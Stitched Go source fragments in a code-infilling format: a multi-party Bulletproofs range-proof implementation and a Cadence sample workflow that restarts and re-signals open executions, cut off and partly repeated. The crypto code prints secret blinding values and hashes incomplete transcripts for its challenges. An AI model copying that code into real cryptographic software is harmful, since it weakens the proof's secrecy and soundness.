fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
}
| cy, cz | identifier_name |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
Comms []ECPoint
A ECPoint
S ECPoint
T1 ECPoint
T2 ECPoint
Tau *big.Int
Th *big.Int
Mu *big.Int
IPP InnerProdArg
// challenges
Cy *big.Int
Cz *big.Int
Cx *big.Int
}
// PrivateParams is the private params of Prover
type PrivateParams struct {
Id int
V *big.Int
AL []*big.Int
AR []*big.Int
SL []*big.Int
SR []*big.Int
Gamma *big.Int
Alpha *big.Int
Rho *big.Int
Tt0 *big.Int
Tt1 *big.Int
Tt2 *big.Int
Tau1 *big.Int
Tau2 *big.Int
}
type InitParams struct {
//EC CryptoParams
N int
M int
}
type ASCommitment struct {
Comm ECPoint
A ECPoint
S ECPoint
}
type T1T2Commitment struct {
T1 ECPoint
T2 ECPoint
}
type OtherShare struct {
Left []*big.Int
Right []*big.Int
That *big.Int
Taux *big.Int
Mu *big.Int
}
func AandS(v *big.Int, id, m int, prip *PrivateParams, EC CryptoParams) ASCommitment {
AS := ASCommitment{}
fmt.Printf("v: %v\n", v)
bitsPerValue := EC.V / m //
if v.Cmp(big.NewInt(0)) == -1 {
panic("Value is below range! Not proving")
}
if v.Cmp(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(bitsPerValue)), EC.N)) == 1 {
panic("Value is above range! Not proving.")
}
prip.Id = id
prip.V = v
gamma, err := rand.Int(rand.Reader, EC.N)
prip.Gamma = gamma
fmt.Printf("gamma: %v\n", gamma)
check(err)
comm := EC.G.Mult(v, EC).Add(EC.H.Mult(gamma, EC), EC)
AS.Comm = comm
aL := reverse(StrToBigIntArray(PadLeft(fmt.Sprintf("%b", v), "0", bitsPerValue)))
prip.AL = aL
aR := VectorAddScalar(aL, big.NewInt(-1), EC)
prip.AR = aR
alpha, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Alpha = alpha
// 设置cryptoparams.go中 v = n * m
BPG := EC.BPG[id*bitsPerValue : (id+1)*bitsPerValue]
BPH := EC.BPH[id*bitsPerValue : (id+1)*bitsPerValue]
A := TwoVectorPCommitWithGens(BPG, BPH, aL, aR, EC).Add(EC.H.Mult(alpha, EC), EC)
AS.A = A
sL := RandVector(bitsPerValue, EC)
sR := RandVector(bitsPerValue, EC)
prip.SL = sL
prip.SR = sR
rho, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Rho = rho
S := TwoVectorPCommitWithGens(BPG, BPH, sL, sR, EC).Add(EC.H.Mult(rho, EC), EC)
AS.S = S
return AS
}
func Fait_y_z(A, S []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) (*big.Int, *big.Int) {
countA := EC.Zero()
countS := EC.Zero()
for i := 0; i < len(A); i++ {
// 是代码中定义的加 代码定义
countA = countA.Add(A[i], EC)
countS = countS.Add(S[i], EC)
}
mpcrp.A = countA
mpcrp.S = countS
chal1s256 := sha256.Sum256([]byte(countA.X.String() + countA.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
mpcrp.Cy = cy
chal2s256 := sha256.Sum256([]byte(countS.X.String() + countS.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
mpcrp.Cz = cz
return cy, cz
}
/*
DeltaMPC is a helper function that is used in the range proof
\DeltaMPC(y, z) = (z-z^2)<1^n, y^n> - z^3 * z^j * <1^n, 2^n>
*/
func DeltaMPC(y []*big.Int, z *big.Int, id, m int, EC CryptoParams) *big.Int {
result := big.NewInt(0)
// (z-z^2)<1^n, y^n>
z2 := new(big.Int).Mod(new(big.Int).Mul(z, z), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Sub(z, z2), EC.N)
t2 := new(big.Int).Mod(new(big.Int).Mul(t1, VectorSum(y, EC)), EC.N)
// z^(3+j)<1^n, 2^n>
z3j := new(big.Int).Exp(z, big.NewInt(3+int64(id)), EC.N)
po2sum := new(big.Int).Sub(new(big.Int).Exp(big.NewInt(2), big.NewInt(int64(EC.V/m)), EC.N), big.NewInt(1))
t3 := new(big.Int).Mod(new(big.Int).Mul(z3j, po2sum), EC.N)
result = new(big.Int).Mod(new(big.Int).Sub(t2, t3), EC.N)
return result
}
func T1andT2(v *big.Int, id, m int, cy, cz *big.Int, prip *PrivateParams, EC CryptoParams) T1T2Commitment {
t1t2 := T1T2Commitment{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
bitsPerValue := EC.V / m
// PowerOfTwos
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
PowerOfCY := PowerVector(EC.V, cy, EC) // EC.V = n * m
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
l0 := VectorAddScalar(aL, new(big.Int).Neg(cz), EC)
l1 := sL
r0 := VectorAdd(
VectorHadamard(
yn,
VectorAddScalar(aR, cz, EC), EC),
z2j2n, EC)
r1 := VectorHadamard(sR, yn, EC)
//calculate t0
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
PowerOfCZ := PowerVector(m, cz, EC)
vz2 := new(big.Int).Mul(PowerOfCZ[id], new(big.Int).Mul(v, z2))
vz2 = new(big.Int).Mod(vz2, EC.N)
t0 := new(big.Int).Mod(new(big.Int).Add(vz2, DeltaMPC(yn, cz, id, m, EC)), EC.N)
t1 := new(big.Int).Mod(new(big.Int).Add(InnerProduct(l1, r0, EC), InnerProduct(l0, r1, EC)), EC.N)
t2 := InnerProduct(l1, r1, EC)
prip.Tt0 = t0
prip.Tt1 = t1
prip.Tt2 = t2
// given the t_i values, we can generate commitments to them
tau1, err := rand.Int(rand.Reader, EC.N)
check(err)
tau2, err := rand.Int(rand.Reader, EC.N)
check(err)
prip.Tau1 = tau1
prip.Tau2 = tau2
T1 := EC.G.Mult(t1, EC).Add(EC.H.Mult(tau1, EC), EC) //commitment to t1
T2 := EC.G.Mult(t2, EC).Add(EC.H.Mult(tau2, EC), EC) //commitment to t2
t1t2.T1 = T1
t1t2.T2 = T2
return t1t2
}
func Fait_x(T1, T2 []ECPoint, mpcrp *MPCRangeProof, EC CryptoParams) *big.Int {
countT1 := EC.Zero()
countT2 := EC.Zero()
for i := 0; i < len(T1); i++ {
countT1 = countT1.Add(T1[i], EC)
countT2 = countT2.Add(T2[i], EC)
}
mpcrp.T1 = countT1
mpcrp.T2 = countT2
chal3s256 := sha256.Sum256([]byte(countT1.X.String() + countT1.Y.String() + countT2.X.String() + countT2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
mpcrp.Cx = cx
return cx
}
func ProFinal(v *big.Int, id, m int, cy, cz, cx *big.Int, prip *PrivateParams, EC CryptoParams) OtherShare {
share := OtherShare{}
// aL aR sL sR
aL := prip.AL
aR := prip.AR
sL := prip.SL
sR := prip.SR
// PowerOfCY PowerOfTwos zPowersTimesTwoVec
bitsPerValue := EC.V / m
PowerOfCY := PowerVector(EC.V, cy, EC)
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
zPowersTimesTwoVec := make([]*big.Int, EC.V) //
for j := 0; j < m; j++ {
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
for i := 0; i < bitsPerValue; i++ {
zPowersTimesTwoVec[j*bitsPerValue+i] = new(big.Int).Mod(new(big.Int).Mul(PowerOfTwos[i], zp), EC.N)
}
}
yn := PowerOfCY[id*bitsPerValue : (id+1)*bitsPerValue]
z2j2n := zPowersTimesTwoVec[id*bitsPerValue : (id+1)*bitsPerValue]
left := CalculateLMRP(aL, sL, cz, cx, EC)
right := CalculateRMRP(aR, sR, yn, z2j2n, cz, cx, EC)
share.Left = left
share.Right = right
// t0 t1 t2
t0 := prip.Tt0
t1 := prip.Tt1
t2 := prip.Tt2
thatPrime := new(big.Int).Mod( // t0 + t1*x + t2*x^2
new(big.Int).Add(t0, new(big.Int).Add(new(big.Int).Mul(t1, cx), new(big.Int).Mul(new(big.Int).Mul(cx, cx), t2))), EC.N)
that := InnerProduct(left, right, EC) // NOTE: BP Java implementation calculates this from the t_i
// thatPrime and that should be equal
if thatPrime.Cmp(that) != 0 {
fmt.Println("Proving -- Uh oh! Two diff ways to compute same value not working")
fmt.Printf("\tthatPrime = %s\n", thatPrime.String())
fmt.Printf("\tthat = %s \n", that.String())
}
share.That = that
// tau1, tau2, gamma rho
tau1 := prip.Tau1
tau2 := prip.Tau2
gamma := prip.Gamma
rho := prip.Rho
alpha := prip.Alpha
fmt.Printf("gamma: %v\n", gamma)
taux1 := new(big.Int).Mod(new(big.Int).Mul(tau2, new(big.Int).Mul(cx, cx)), EC.N)
taux2 := new(big.Int).Mod(new(big.Int).Mul(tau1, cx), EC.N)
z2j := new(big.Int).Exp(cz, big.NewInt(2+int64(id)), EC.N)
tmp1 := new(big.Int).Mul(gamma, z2j)
taux := new(big.Int).Mod(new(big.Int).Add(taux1, new(big.Int).Add(taux2, tmp1)), EC.N)
mu := new(big.Int).Mod(new(big.Int).Add(alpha, new(big.Int).Mul(rho, cx)), EC.N)
share.Taux = taux
share.Mu = mu
return share
}
func DealerFinal(left, right []*big.Int, tx, rx, mu []*big.Int, m int, mpcrp *MPCRangeProof, cy *big.Int, EC CryptoParams) {
countThat := big.NewInt(0)
countTaux := big.NewInt(0)
countMu := big.NewInt(0)
countLeft := left
countRight := right
bitsPerValue := EC.V / m
for j := 0; j < len(tx); j++ {
countThat = new(big.Int).Add(countThat, tx[j])
countTaux = new(big.Int).Add(countTaux, rx[j])
countMu = new(big.Int).Add(countMu, mu[j])
}
mpcrp.Tau = countTaux
mpcrp.Th = countThat
mpcrp.Mu = countMu
HPrime := make([]ECPoint, len(EC.BPH))
PowerOfCY := PowerVector(EC.V, cy, EC)
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowerOfCY[j*bitsPerValue+i], EC.N), EC)
}
}
P := TwoVectorPCommitWithGens(EC.BPG, HPrime, countLeft, countRight, EC)
that := InnerProduct(countLeft, countRight, EC)
IPP := InnerProductProve(countLeft, countRight, that, P, EC.U, EC.BPG, HPrime, EC)
mpcrp.IPP = IPP
}
func MPCVerify(mrp *MPCRangeProof, EC CryptoParams) bool {
m := len(mrp.Comms)
bits | PerValue := EC.V / m
//changes:
// check 1 changes since it includes all commitments
// check 2 commitment generation is also different
// verify the challenges
chal1s256 := sha256.Sum256([]byte(mrp.A.X.String() + mrp.A.Y.String()))
cy := new(big.Int).SetBytes(chal1s256[:])
if cy.Cmp(mrp.Cy) != 0 {
fmt.Println("MPCVerify - Challenge Cy failing!")
return false
}
chal2s256 := sha256.Sum256([]byte(mrp.S.X.String() + mrp.S.Y.String()))
cz := new(big.Int).SetBytes(chal2s256[:])
if cz.Cmp(mrp.Cz) != 0 {
fmt.Println("MPCVerify - Challenge Cz failing!")
return false
}
chal3s256 := sha256.Sum256([]byte(mrp.T1.X.String() + mrp.T1.Y.String() + mrp.T2.X.String() + mrp.T2.Y.String()))
cx := new(big.Int).SetBytes(chal3s256[:])
if cx.Cmp(mrp.Cx) != 0 {
fmt.Println("MPCVerify - Challenge Cx failing!")
return false
}
// given challenges are correct, very range proof
PowersOfY := PowerVector(EC.V, cy, EC)
// t_hat * G + tau * H
lhs := EC.G.Mult(mrp.Th, EC).Add(EC.H.Mult(mrp.Tau, EC), EC)
// z^2 * \bold{z}^m \bold{V} + delta(y,z) * G + x * T1 + x^2 * T2
CommPowers := EC.Zero()
PowersOfZ := PowerVector(m, cz, EC)
z2 := new(big.Int).Mod(new(big.Int).Mul(cz, cz), EC.N)
for j := 0; j < m; j++ {
CommPowers = CommPowers.Add(mrp.Comms[j].Mult(new(big.Int).Mul(z2, PowersOfZ[j]), EC), EC)
}
rhs := EC.G.Mult(DeltaMRP(PowersOfY, cz, m, EC), EC).Add(
mrp.T1.Mult(cx, EC), EC).Add(
mrp.T2.Mult(new(big.Int).Mul(cx, cx), EC), EC).Add(CommPowers, EC)
if !lhs.Equal(rhs) {
fmt.Println("MPCVerify - Uh oh! Check line (63) of verification")
fmt.Println(rhs)
fmt.Println(lhs)
return false
}
tmp1 := EC.Zero()
zneg := new(big.Int).Mod(new(big.Int).Neg(cz), EC.N)
for i := range EC.BPG {
tmp1 = tmp1.Add(EC.BPG[i].Mult(zneg, EC), EC)
}
PowerOfTwos := PowerVector(bitsPerValue, big.NewInt(2), EC)
tmp2 := EC.Zero()
// generate h'
HPrime := make([]ECPoint, len(EC.BPH))
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
HPrime[j*bitsPerValue+i] = EC.BPH[j*bitsPerValue+i].Mult(new(big.Int).ModInverse(PowersOfY[j*bitsPerValue+i], EC.N), EC)
}
}
for j := 0; j < m; j++ {
for i := 0; i < bitsPerValue; i++ {
val1 := new(big.Int).Mul(cz, PowersOfY[j*bitsPerValue+i])
zp := new(big.Int).Exp(cz, big.NewInt(2+int64(j)), EC.N)
val2 := new(big.Int).Mod(new(big.Int).Mul(zp, PowerOfTwos[i]), EC.N)
tmp2 = tmp2.Add(HPrime[j*bitsPerValue+i].Mult(new(big.Int).Add(val1, val2), EC), EC)
}
}
// without subtracting this value should equal muCH + l[i]G[i] + r[i]H'[i]
// we want to make sure that the innerproduct checks out, so we subtract it
P := mrp.A.Add(mrp.S.Mult(cx, EC), EC).Add(tmp1, EC).Add(tmp2, EC).Add(EC.H.Mult(mrp.Mu, EC).Neg(EC), EC)
//fmt.Println(P)
if !InnerProductVerifyFast(mrp.Th, P, EC.U, EC.BPG, HPrime, mrp.IPP, EC) {
fmt.Println("MPCVerify - Uh oh! Check line (65) of verification!")
return false
}
return true
}
| identifier_body | |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
logger.Error("Failed to recover execution.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.Error(err))
return err
}
// Record a heartbeat after each recovery of execution
activity.RecordHeartbeat(ctx, index)
}
return nil
}
func recoverSingleExecution(ctx context.Context, workflowID string) error {
logger := activity.GetLogger(ctx)
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return err
}
execution := &shared.WorkflowExecution{
WorkflowId: common.StringPtr(workflowID),
}
history, err := getHistory(ctx, execution)
if err != nil {
return err
}
if history == nil || len(history) == 0 {
// Nothing to recover
return nil
}
firstEvent := history[0]
lastEvent := history[len(history)-1]
// Extract information from StartWorkflowExecution parameters so we can start a new run
params, err := extractStateFromEvent(workflowID, firstEvent)
if err != nil {
return err
}
// Parse the entire history and extract all signals so they can be replayed back to new run
signals, err := extractSignals(history)
if err != nil {
return err
}
// First terminate existing run if already running
if !isExecutionCompleted(lastEvent) {
err := cadenceClient.TerminateWorkflow(ctx, execution.GetWorkflowId(), execution.GetRunId(), "Recover", nil)
if err != nil {
return err
}
}
// Start new execution run
newRun, err := cadenceClient.StartWorkflow(ctx, params.Options, "TripWorkflow", params.State)
if err != nil {
return err
}
// re-inject all signals to new run
for _, s := range signals {
cadenceClient.SignalWorkflow(ctx, execution.GetWorkflowId(), newRun.RunID, s.Name, s.Data)
}
logger.Info("Successfully restarted workflow.",
zap.String("WorkflowID", execution.GetWorkflowId()),
zap.String("NewRunID", newRun.RunID))
return nil
}
func extractStateFromEvent(workflowID string, event *shared.HistoryEvent) (*RestartParams, error) {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionStarted:
attr := event.WorkflowExecutionStartedEventAttributes
state, err := deserializeUserState(attr.Input)
if err != nil {
// Corrupted Workflow Execution State
return nil, err
}
return &RestartParams{
Options: client.StartWorkflowOptions{
ID: workflowID,
TaskList: attr.TaskList.GetName(),
ExecutionStartToCloseTimeout: time.Second * time.Duration(attr.GetExecutionStartToCloseTimeoutSeconds()),
DecisionTaskStartToCloseTimeout: time.Second * time.Duration(attr.GetTaskStartToCloseTimeoutSeconds()),
WorkflowIDReusePolicy: client.WorkflowIDReusePolicyAllowDuplicate,
//RetryPolicy: attr.RetryPolicy,
},
State: state,
}, nil
default:
return nil, errors.New("Unknown event type")
}
}
func | (events []*shared.HistoryEvent) ([]*SignalParams, error) {
var signals []*SignalParams
for _, event := range events {
if event.GetEventType() == shared.EventTypeWorkflowExecutionSignaled {
attr := event.WorkflowExecutionSignaledEventAttributes
if attr.GetSignalName() == TripSignalName && attr.Input != nil && len(attr.Input) > 0 {
signalData, err := deserializeTripEvent(attr.Input)
if err != nil {
// Corrupted Signal Payload
return nil, err
}
signal := &SignalParams{
Name: attr.GetSignalName(),
Data: signalData,
}
signals = append(signals, signal)
}
}
}
return signals, nil
}
func isExecutionCompleted(event *shared.HistoryEvent) bool {
switch event.GetEventType() {
case shared.EventTypeWorkflowExecutionCompleted, shared.EventTypeWorkflowExecutionTerminated,
shared.EventTypeWorkflowExecutionCanceled, shared.EventTypeWorkflowExecutionFailed,
shared.EventTypeWorkflowExecutionTimedOut:
return true
default:
return false
}
}
func getAllExecutionsOfType(ctx context.Context, cadenceClient client.Client,
workflowType string) ([]*shared.WorkflowExecution, error) {
var openExecutions []*shared.WorkflowExecution
var nextPageToken []byte
for hasMore := true; hasMore; hasMore = len(nextPageToken) > 0 {
resp, err := cadenceClient.ListOpenWorkflow(ctx, &shared.ListOpenWorkflowExecutionsRequest{
Domain: common.StringPtr(DomainName),
MaximumPageSize: common.Int32Ptr(10),
NextPageToken: nextPageToken,
StartTimeFilter: &shared.StartTimeFilter{
EarliestTime: common.Int64Ptr(0),
LatestTime: common.Int64Ptr(time.Now().UnixNano()),
},
TypeFilter: &shared.WorkflowTypeFilter{
Name: common.StringPtr(workflowType),
},
})
if err != nil {
return nil, err
}
for _, r := range resp.Executions {
openExecutions = append(openExecutions, r.Execution)
}
nextPageToken = resp.NextPageToken
activity.RecordHeartbeat(ctx, nextPageToken)
}
return openExecutions, nil
}
func getHistory(ctx context.Context, execution *shared.WorkflowExecution) ([]*shared.HistoryEvent, error) {
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
iter := cadenceClient.GetWorkflowHistory(ctx, execution.GetWorkflowId(), execution.GetRunId(), false,
shared.HistoryEventFilterTypeAllEvent)
var events []*shared.HistoryEvent
for iter.HasNext() {
event, err := iter.Next()
if err != nil {
return nil, err
}
events = append(events, event)
}
return events, nil
}
func getCadenceClientFromContext(ctx context.Context) (client.Client, error) {
logger := activity.GetLogger(ctx)
cadenceClient := ctx.Value(CadenceClientKey).(client.Client)
if cadenceClient == nil {
logger.Error("Could not retrieve cadence client from context.")
return nil, ErrCadenceClientNotFound
}
return cadenceClient, nil
}
| extractSignals | identifier_name |
recovery_workflow.go | package main
import (
"context"
"errors"
"time"
"github.com/pborman/uuid"
"go.uber.org/cadence"
"go.uber.org/cadence/.gen/go/shared"
"go.uber.org/cadence/activity"
"go.uber.org/cadence/client"
"go.uber.org/cadence/workflow"
"go.uber.org/zap"
"github.com/uber-common/cadence-samples/cmd/samples/common"
"github.com/uber-common/cadence-samples/cmd/samples/recovery/cache"
)
type (
// Params is the input parameters to RecoveryWorkflow
Params struct {
ID string
Type string
Concurrency int
}
// ListOpenExecutionsResult is the result returned from listOpenExecutions activity
ListOpenExecutionsResult struct {
ID string
Count int
HostID string
}
// RestartParams are parameters extracted from StartWorkflowExecution history event
RestartParams struct {
Options client.StartWorkflowOptions
State UserState
}
// SignalParams are the parameters extracted from SignalWorkflowExecution history event
SignalParams struct {
Name string
Data TripEvent
}
)
// ClientKey is the key for lookup
type ClientKey int
const (
// DomainName used for this sample
DomainName = "samples-domain"
// CadenceClientKey for retrieving cadence client from context
CadenceClientKey ClientKey = iota
// WorkflowExecutionCacheKey for retrieving executions cache from context
WorkflowExecutionCacheKey
)
// HostID - Use a new uuid just for demo so we can run 2 host specific activity workers on same machine.
// In real world case, you would use a hostname or ip address as HostID.
var HostID = uuid.New()
var (
// ErrCadenceClientNotFound when cadence client is not found on context
ErrCadenceClientNotFound = errors.New("failed to retrieve cadence client from context")
// ErrExecutionCacheNotFound when executions cache is not found on context
ErrExecutionCacheNotFound = errors.New("failed to retrieve cache from context")
)
// This is registration process where you register all your workflows
// and activity function handlers.
func init() {
workflow.RegisterWithOptions(recoverWorkflow, workflow.RegisterOptions{Name: "recoverWorkflow"})
activity.Register(listOpenExecutions)
activity.Register(recoverExecutions)
}
// recoverWorkflow is the workflow implementation to recover TripWorkflow executions
func recoverWorkflow(ctx workflow.Context, params Params) error {
logger := workflow.GetLogger(ctx)
logger.Info("Recover workflow started.")
ao := workflow.ActivityOptions{
ScheduleToStartTimeout: 10 * time.Minute,
StartToCloseTimeout: 10 * time.Minute,
HeartbeatTimeout: time.Second * 30,
}
ctx = workflow.WithActivityOptions(ctx, ao)
var result ListOpenExecutionsResult
err := workflow.ExecuteActivity(ctx, listOpenExecutions, params.Type).Get(ctx, &result)
if err != nil {
logger.Error("Failed to list open workflow executions.", zap.Error(err))
return err
}
concurrency := 1
if params.Concurrency > 0 {
concurrency = params.Concurrency
}
if result.Count < concurrency {
concurrency = result.Count
}
batchSize := result.Count / concurrency
if result.Count%concurrency != 0 {
batchSize++
}
// Setup retry policy for recovery activity
info := workflow.GetInfo(ctx)
expiration := time.Duration(info.ExecutionStartToCloseTimeoutSeconds) * time.Second
retryPolicy := &cadence.RetryPolicy{
InitialInterval: time.Second,
BackoffCoefficient: 2,
MaximumInterval: 10 * time.Second,
ExpirationInterval: expiration,
MaximumAttempts: 100,
}
ao = workflow.ActivityOptions{
ScheduleToStartTimeout: expiration,
StartToCloseTimeout: expiration,
HeartbeatTimeout: time.Second * 30,
RetryPolicy: retryPolicy,
}
ctx = workflow.WithActivityOptions(ctx, ao)
doneCh := workflow.NewChannel(ctx)
for i := 0; i < concurrency; i++ {
startIndex := i * batchSize
workflow.Go(ctx, func(ctx workflow.Context) {
err = workflow.ExecuteActivity(ctx, recoverExecutions, result.ID, startIndex, batchSize).Get(ctx, nil)
if err != nil {
logger.Error("Recover executions failed.", zap.Int("StartIndex", startIndex), zap.Error(err))
} else {
logger.Info("Recover executions completed.", zap.Int("StartIndex", startIndex))
}
doneCh.Send(ctx, "done")
})
}
for i := 0; i < concurrency; i++ {
doneCh.Receive(ctx, nil)
}
logger.Info("Workflow completed.", zap.Int("Result", result.Count))
return nil
}
func listOpenExecutions(ctx context.Context, workflowType string) (*ListOpenExecutionsResult, error) {
key := uuid.New()
logger := activity.GetLogger(ctx)
logger.Info("List all open executions of type.",
zap.String("WorkflowType", workflowType),
zap.String("HostID", HostID))
cadenceClient, err := getCadenceClientFromContext(ctx)
if err != nil {
return nil, err
}
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return nil, ErrExecutionCacheNotFound
}
openExecutions, err := getAllExecutionsOfType(ctx, cadenceClient, workflowType)
if err != nil {
return nil, err
}
executionsCache.Put(key, openExecutions)
return &ListOpenExecutionsResult{
ID: key,
Count: len(openExecutions),
HostID: HostID,
}, nil
}
func recoverExecutions(ctx context.Context, key string, startIndex, batchSize int) error {
logger := activity.GetLogger(ctx)
logger.Info("Starting execution recovery.",
zap.String("HostID", HostID),
zap.String("Key", key),
zap.Int("StartIndex", startIndex),
zap.Int("BatchSize", batchSize))
executionsCache := ctx.Value(WorkflowExecutionCacheKey).(cache.Cache)
if executionsCache == nil {
logger.Error("Could not retrieve cache from context.")
return ErrExecutionCacheNotFound
}
openExecutions := executionsCache.Get(key).([]*shared.WorkflowExecution)
endIndex := startIndex + batchSize
// Check if this activity has previous heartbeat to retrieve progress from it
if activity.HasHeartbeatDetails(ctx) {
var finishedIndex int
if err := activity.GetHeartbeatDetails(ctx, &finishedIndex); err == nil {
// we have finished progress
startIndex = finishedIndex + 1 // start from next one.
}
}
for index := startIndex; index < endIndex && index < len(openExecutions); index++ {
execution := openExecutions[index]
if err := recoverSingleExecution(ctx, execution.GetWorkflowId()); err != nil {
